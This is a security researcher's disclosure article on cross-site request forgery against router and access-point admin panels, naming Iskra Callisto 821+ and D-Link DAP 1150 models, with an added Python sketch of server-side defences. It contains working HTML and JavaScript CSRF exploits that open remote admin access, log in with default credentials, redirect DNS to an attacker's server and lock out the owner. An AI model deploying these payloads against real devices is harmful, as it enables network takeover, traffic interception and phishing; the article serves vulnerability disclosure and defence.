CSRF attacks on network devices


Eugene Dokukin aka MustLive

Similar to web applications on web sites, the admin panels of various network devices also contain vulnerabilities, including Cross-Site Request Forgery (CSRF) vulnerabilities. These can be attacked in the same way as web sites: by attacking users who have access to these network devices.

Almost all network devices are vulnerable to CSRF [1], because the developers of such devices misunderstand this threat. So attackers can conduct remote CSRF attacks on network devices such as routers, Wi-Fi Access Points and others to do many different nasty things. Attackers can DoS them, disable various functionality and change various settings, which allows them to take full control of the devices (and of the users' traffic passing through these devices).

Such vulnerabilities exist in various network devices, such as the Iskra Callisto 821+, the D-Link DSL-500T ADSL Router and the D-Link DAP 1150, in which I have found vulnerabilities and disclosed them at my site. By using CSRF attacks on these vulnerabilities an attacker can gain full control of these devices.

Possibilities of CSRF attacks on network devices.

Developers of network devices don't pay enough attention to security (vulnerabilities in such devices are found all the time), especially to CSRF, because they assume that the devices will reside in a LAN and will not be accessible from the Internet. This is not true when such a device resides in a LAN that contains computers with Internet access: CSRF attacks can be conducted via the browsers of the users of these computers. Not to mention that there is also the threat of local attacks, from malicious local users or from malware, so developers should not leave their devices with either remote or local vulnerabilities.

For example, routers and ADSL modems, which give users access to the Internet, are typically affected devices, and they can be attacked remotely via CSRF from the Internet. For external attackers the most interesting targets are routers and other devices with router functionality (ADSL modems, Wi-Fi Access Points, etc.), because it's possible to set up these devices so that the attacker takes control of the traffic: all traffic (such as DNS requests) will be sent via his own server, allowing him to sniff confidential data and conduct phishing attacks on all users in the LAN who use these devices to access the Internet.

Real attacks on network devices.

Let's see how real attacks can be conducted, using the Iskra Callisto 821+ and the D-Link DAP 1150 as examples. The Callisto 821+ is an ADSL Router (and similar vulnerabilities can exist in all other devices from Iskra). The DAP 1150 is a Wi-Fi Access Point and router (similar vulnerabilities can exist in all other devices from D-Link).

Different attacks can be created. Let's take a look at two attacks which are very advantageous for attackers. In the first scenario the attacker conducts part of the actions remotely and part manually via the admin panel, and in the second scenario the attacker conducts all the actions remotely. Both the Callisto 821+ and the DAP 1150 (in Router mode) support remote access to the admin panel and support setting DNS servers, but I'll show a different attack scenario for each device.

The first attack is to turn on remote access to the admin panel (it's off by default), allowing the remote attacker to access the admin panel from the Internet and change all required settings (and this attack can be conducted in one request). Network devices which have an option to allow remote access and which have CSRF vulnerabilities can be attacked in this way.

The second attack sends multiple requests to change the DNS settings (and other settings) of the router. Network devices which don't allow remote access (because there is no such option in the admin panel) but which have CSRF vulnerabilities need multi-request attacks to change all required settings remotely.

The scenario of the first attack will be the following:

1. Identify the local IP address of the device (in most cases the default address will work).

2. Send a request to open remote access.

The scenario of the second attack will be the following:

1. Identify the local IP address of the device (in most cases the default address will work).

2. Send a request for remote login into the admin panel (optional).

3. Send a request to change DNS.

4. Send a request to save the settings.

5. Send a request to change the default password (optional).

The attack #1.

For the first scenario the attack will be as follows:

1. Taking into account the Predictable Resource Location vulnerability in the Callisto 821+ [2], the admin panel will by default be at http://192.168.1.1.

2. Conduct an attack on the CSRF vulnerability in the Callisto 821+ [3] (against a logged-in user) to open remote access (e.g. for 30 minutes, as in this example):

<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/system/remote.html" method="post">
<input type="hidden" name="idleTimeout" value="30">
</form>
</body>

After that, the attacker will be able to access the admin panel remotely from the Internet for the time for which remote access was opened. The attacker will be able to change all required settings, such as the DNS settings, to attack all users who go to the Internet via this device. To log into the router's admin panel he will need to use the default username and password. If there is a possibility that the device's owner has changed the default password, then after opening remote access it's also necessary to add a new user with access to the admin panel via another CSRF vulnerability in the Callisto 821+ [4].

The attack #2.

For the second scenario the attack will be as follows:

1. Taking into account the Predictable Resource Location vulnerability in the DAP 1150 [5], the admin panel will by default be at http://192.168.0.50, and the default username and password are admin:admin.

2. Use the CSRF vulnerability in the DAP 1150 [5] to conduct a remote login attack (optional).

<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.0.50/index.cgi" method="post">
<input type="hidden" name="v2" value="y">
<input type="hidden" name="rs_type" value="html">
<input type="hidden" name="A1" value="admin">
<input type="hidden" name="A2" value="admin">
<input type="hidden" name="auth" value="auth">
</form>
</body>

Remote login is a CSRF attack on login forms, which I presented in April 2011 in my article Attacks on unprotected login forms [6]. This is an optional step (without it the attack must be conducted against a user who is already logged in). Attackers can use it to make sure that the victim is logged into the admin panel before making further attacks on different functionality of the admin panel.

Such a straightforward remote login attack will work against every affected network device, but not against the DAP 1150, due to the specific implementation of authentication by D-Link in this device. Besides sending the above-mentioned POST request, it's also necessary to set two cookies (with the username and password) just before the request, i.e. the browser should send these cookies along with the request. To get around this pitfall one can use the method which I developed last year and described in my article Remote login with using of Clickjacking [7].

3. In this step we can change the DNS settings or change the routing table to attack users of this device. Let's set the attacker's DNS server (50.50.50.50 in this example):

<img src="http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=7&res_struct_size=0&res_buf={%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">

4. Save the settings, so that they will remain in effect even after a restart of the device [8].

<img src="http://192.168.0.50/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y">

5. Change the default password to prevent the admin from logging into the admin panel [9] (optional).

<img src="http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|">

As an optional step, the attacker can change the default password to prevent the admin from logging into the admin panel. This requires sending a CSRF request to change the password and then repeating the second step (with the new password) and the third step to save it persistently (because after the password is changed the user is logged out of the admin panel).

After these steps, it will be possible to attack all users who go to the Internet via this device, because all DNS requests will go through the attacker's DNS server.

These steps of the attack (without the optional steps) can be combined into one exploit:

<body onLoad="StartCSRF()">
<script>
// Create three hidden iframes (csrf1..csrf3), one per request, then fire the
// requests one second apart so each has time to complete.
function StartCSRF() {
 for (var i=1;i<=3;i++) {
 var ifr = document.createElement("iframe");
 ifr.setAttribute('name', 'csrf'+i);
 ifr.setAttribute('width', '0');
 ifr.setAttribute('height', '0');
 document.body.appendChild(ifr);
 }
 CSRF1();
 setTimeout(CSRF2,1000);
 setTimeout(CSRF3,2000);
}
// Step 3: change the DNS server.
function CSRF1() {
 window.frames["csrf3"].document.body.innerHTML = '<form name="hack" action="http://192.168.0.50/index.cgi" method="get">\n<input type="hidden" name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input type="hidden" name="res_json" value="y">\n<input type="hidden" name="res_data_type" value="json">\n<input type="hidden" name="res_config_action" value="3">\n<input type="hidden" name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size" value="0">\n<input type="hidden" name="res_buf" value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>';
 window.frames["csrf3"].document.hack.submit();
}
// Step 4: save the settings persistently.
function CSRF2() {
 window.frames["csrf1"].document.body.innerHTML = '<form name="hack" action="http://192.168.0.50/index.cgi" method="get">\n<input type="hidden" name="res_cmd" value="20">\n<input type="hidden" name="res_buf" value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input type="hidden" name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n</form>';
 window.frames["csrf1"].document.hack.submit();
}
// Step 5: change the default password.
function CSRF3() {
 window.frames["csrf2"].document.body.innerHTML = '<form name="hack" action="http://192.168.0.50/index.cgi" method="get">\n<input type="hidden" name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input type="hidden" name="res_config_action" value="3">\n<input type="hidden" name="res_config_id" value="69">\n<input type="hidden" name="res_struct_size" value="1">\n<input type="hidden" name="res_buf" value="password|">\n</form>';
 window.frames["csrf2"].document.hack.submit();
}
</script>
</body>

The attack is conducted using standard approaches for CSRF attacks. The exploit needs to be placed at the attacker's site. Then the attacker needs to force a victim to visit the page with the exploit by means of social engineering. After visiting such a page, the victim will not see anything suspicious, only the content of the web page that distracts attention, while the attack is conducted hiddenly.

These examples of CSRF exploits were created with my CSRF Generator [10], which can be used for creating PoCs and exploits during security research and security audits.
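As an added example (not part of this article, and not any vendor's firmware code), the following Python sketch models the server-side checks that would have stopped both scenarios above: a settings change is refused if it arrives via GET (the img-based requests), if its Origin/Referer is not the device's own origin (the auto-submitted cross-site forms), or if it lacks the per-session anti-CSRF token. The device origin, the session dict, the field names and the sample requests are constructed for illustration.

```python
"""Server-side CSRF defence for a device admin panel (added example, not the
article's or any vendor's code). Sample requests are constructed to mirror
the attacks described in the article; origin, session and field names are assumed."""
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_ORIGIN = "http://192.168.1.1"  # the panel's own origin (assumed)


def issue_token(session):
    """Bind a fresh random anti-CSRF token to the (constructed) session dict."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def request_origin(headers):
    """Origin header if present, else scheme://host from Referer, else None."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        p = urlsplit(referer)
        return f"{p.scheme}://{p.netloc}"
    return None  # fail closed: a request carrying neither header is refused


def authorize_state_change(method, headers, form, session):
    """Return (allowed, reason) for a request that would change device settings."""
    if method != "POST":
        # Refuses the <img src="...index.cgi?..."> style of request outright.
        return False, "state change via GET refused"
    if request_origin(headers) != DEVICE_ORIGIN:
        # Refuses a form auto-submitted from the attacker's site; the value
        # "null" sent by sandboxed frames also fails this comparison.
        return False, "cross-site or missing Origin/Referer"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        # The token is random per session, so a cross-site page cannot know it.
        return False, "missing or invalid anti-CSRF token"
    return True, "ok"


# Constructed requests mirroring the article: the one-request remote-access
# POST from a cross-site page, and the img-tag GET that changes DNS settings.
ATTACK_POST = ("POST", {"Origin": "http://attacker.example"}, {"idleTimeout": "30"})
ATTACK_IMG = ("GET", {"Referer": "http://attacker.example/page.html"}, {"res_config_id": "7"})
```

A legitimate change from the panel's own pages carries the device origin and the token issued to that session; everything else, including a request that arrives with no Origin or Referer at all, is refused.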

Conclusion.

Because CSRF vulnerabilities are very widespread among the network devices used in LANs, and because the developers of network devices don't pay enough attention to security, especially concerning CSRF, we have arrived at a situation where almost all network devices have CSRF vulnerabilities which can be attacked remotely via the Internet (by attacking users who go to the Internet from computers in those LANs). This can lead to serious consequences, up to the compromise of the whole network, including sniffing of all Internet traffic, MITM and forging of connections to web sites.

References:

1. Cross-Site Request Forgery (http://projects.webappsec.org/Cross-Site-Request-Forgery).
2. Vulnerabilities in ADSL modem Callisto 821+ (http://websecurity.com.ua/5161/).
3. CSRF vulnerabilities in ADSL modem Callisto 821+ (http://websecurity.com.ua/5172/).
4. New CSRF and XSS vulnerabilities in ADSL modem Callisto 821+ (http://websecurity.com.ua/5168/).
5. Vulnerabilities in D-Link DAP 1150 (http://websecurity.com.ua/5558/).
6. Attacks on unprotected login forms (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).
7. Remote login with using of Clickjacking (http://websecurity.com.ua/5447/).
8. Multiple CSRF, DoS and XSS vulnerabilities in D-Link DAP 1150 (http://websecurity.com.ua/5567/).
9. AoF and CSRF vulnerabilities in D-Link DAP 1150 (http://websecurity.com.ua/5561/).
10. CSRF Generator (http://websecurity.com.ua/csrf_generator/).